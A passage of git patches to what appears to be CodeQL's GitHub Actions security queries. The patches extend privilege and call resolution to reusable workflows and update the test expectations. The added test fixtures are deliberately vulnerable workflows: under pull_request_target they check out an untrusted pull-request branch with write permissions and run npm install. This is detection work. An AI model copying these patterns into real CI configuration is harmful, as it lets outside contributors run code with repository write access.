ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9ac67575b8b..f6c31a6e8ea 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -252,10 +252,26 @@ predicate inPrivilegedExternallyTriggerableJob(AstNode node) { ) } +predicate calledByPrivilegedExternallyTriggerableJob(AstNode node) { + exists(ReusableWorkflow rw, ExternalJob caller, Job callee | + callee = node.getEnclosingJob() and + rw.getACaller() = caller and + rw.getAJob() = callee and + caller.isPrivilegedExternallyTriggerable() + ) + or + exists(LocalJob caller | + caller = node.getEnclosingCompositeAction().getACallerJob() and + caller.isPrivilegedExternallyTriggerable() + ) +} + predicate inPrivilegedContext(AstNode node) { inPrivilegedCompositeAction(node) or inPrivilegedExternallyTriggerableJob(node) + or + calledByPrivilegedExternallyTriggerableJob(node) } predicate inNonPrivilegedCompositeAction(AstNode node) { diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 1159ccb53ae..529bbc82087 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -89,6 +89,23 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = this.(Cfg::Node).getLocation() } } +string getRepoRoot() { + exists(Workflow w | + w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + result = + w.getLocation() + .getFile() + .getRelativePath() + .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and + // exclude workflow_enum reusable workflows directory root + not result.indexOf(".github/reusable_workflows/") > -1 + or + not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and + result = "" + ) +} + /** * A Cfg scope that can be called */ @@ -97,28 +114,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow - then - //result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() - result = - this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .suffix(this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .indexOf("/.github/workflows") + 1) or - result = - this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .suffix(this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .indexOf(".github/workflows")) + then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() // or else if this instanceof CompositeAction then @@ -154,7 +150,13 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } +DataFlowCallable viableCallable(DataFlowCall c) { + c.getName() = result.getName() or + c.getName() = result.getName().replaceAll(getRepoRoot(), "") or + // special case for reusable workflows downloaded by the workflow_enum action + c.getName() = + result.getName().replaceAll(getRepoRoot(), "").replaceAll(".github/reusable_workflows/", "") +} /** * Gets a node that can read the value returned from `call` with return kind diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4123359b551..9ebd5508802 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,4 +1,5 @@ edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -29,6 +30,7 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -126,7 +128,9 @@ nodes | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -179,6 +183,7 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | @@ -385,6 +390,7 @@ subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index fa665b85388..c7d607f7c00 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -1,4 +1,5 @@ edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -29,6 +30,7 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -126,7 +128,9 @@ nodes | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -179,6 +183,7 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | diff --git a/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml b/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml new file mode 100644 index 00000000000..3b8a6d6dd62 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml new file mode 100644 index 00000000000..e53e55aff4c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request_target: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml new file mode 100644 index 00000000000..50c0dd4901c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml new file mode 100644 index 00000000000..1e7558b3bc0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: ./.github/workflows/reusable_local.yml + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml new file mode 100644 index 00000000000..3b8a6d6dd62 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 8bb9e02559c..3db6902ad2f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,7 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | @@ -146,6 +147,7 @@ edges | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | | .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | @@ -205,6 +207,7 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | @@ -224,6 +227,7 @@ edges | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | From 1dd7c3d2ef75b8d45b1f5ec2f1cdaf3ba9cc6c27 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 22 Sep 2024 22:06:35 +0200 Subject: [PATCH 0519/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8135237d6ce..ec2e82dfe01 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.48 +version: 0.1.49 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a40d5868789..70f493e1d64 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.48 +version: 0.1.49 groups: [actions, queries] suites: codeql-suites extractor: javascript From df59e6f5d29e796702900795e4bb72daaf878bb9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 10:18:29 +0200 Subject: [PATCH 0520/1267] Consider a Reusable Workflow privileged if a caller is --- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 +- .../dataflow/internal/DataFlowPublic.qll | 2 +- ql/test/library-tests/test.expected | 1575 +---------------- .../CWE-094/CodeInjectionMedium.expected | 4 + .../TestRepo/.github/workflows/formal.yml | 70 + .../CWE-829/.github/workflows/formal.yml | 12 + .../UntrustedCheckoutCritical.expected | 2 + .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 8 files changed, 96 insertions(+), 1576 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2267c7ff694..d0eb440d0d5 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -2,6 +2,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Helper private import codeql.actions.config.Config +private import codeql.actions.DataFlow /** * Gets the length of each line in the StringValue . @@ -433,7 +434,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { } ExternalJobImpl getACaller() { - result.getCallee() = this.getLocation().getFile().getRelativePath() + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 96568f86db3..fbaf44c282f 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -72,7 +72,7 @@ class CallNode extends ExprNode { CallNode() { this.getCfgNode() instanceof DataFlowCall } - string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() } + DataFlowCallable getCalleeNode() { result = viableCallable(this.getCfgNode()) } } /** diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 9205675ac0f..fe5a2df8dd0 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,1574 +1 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | -| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | -| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| 